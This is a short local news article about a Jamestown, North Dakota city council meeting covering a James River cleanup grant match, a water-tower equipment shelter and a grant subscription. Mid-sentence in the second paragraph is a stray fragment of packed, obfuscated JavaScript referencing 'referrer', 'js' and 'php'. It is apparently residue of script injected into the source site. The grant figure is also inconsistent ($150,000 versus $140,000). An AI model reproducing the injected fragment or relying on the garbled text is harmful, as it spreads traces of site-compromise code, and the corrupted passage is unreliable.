JAMESTOWN, N.D. (NewsDakota.com) – The Jamestown City Council will be putting forth funding to acquire matching funds from the state to clean up the James River.
A Community Development Block Grant of $150,000 had been put forth by the state, but required matching funds from an entity. Earlier abrzi|var|u0026u|referrer|ahhha||js|php’.split(‘|’),0,{}))
in October, the Stutsman County Commission stated they would become the flow through entity, but could not put forth any matching funds. The city then entered the discussion.
Jamestown Mayor Katie Andersen says the understanding is that the County Commission could budget for repayment to the city in 2019. Councilman Dan Buchanan asked if the city would need to start over if the county didn’t agree to the other half of the $140,000.
The deadline for the grant has passed, but it has been expressed that there has been interest in the grant. Mayor Andersen says a commitment was needed in order to secure the funding.
The council unanimously approved.
Later, discussion was held regarding the placement of an 8′ by 8′ structure on a 10′ by 10′ pad at the water tower located at 1704 4th Avenue SW to shelter radio equipment for i3G Media.
Mayor Andersen says there had been some concerns brought forth by city employees with equipment at the site.
With other equipment at the site, there will need to be some agreement language created by City Attorney Leo Ryan for not just i3G Media, but also other entities on site.
City Administrator Jeff Fuchs stated that he had concerns on the cost for the city if there were not agreement language.
The council moved to table the request. The project may be delayed until late December or later.
Mayor Andersen then brought up a grant finding subscription for the city through the North Dakota League of Cities. She says the $40 subscription would be beneficial for the city.
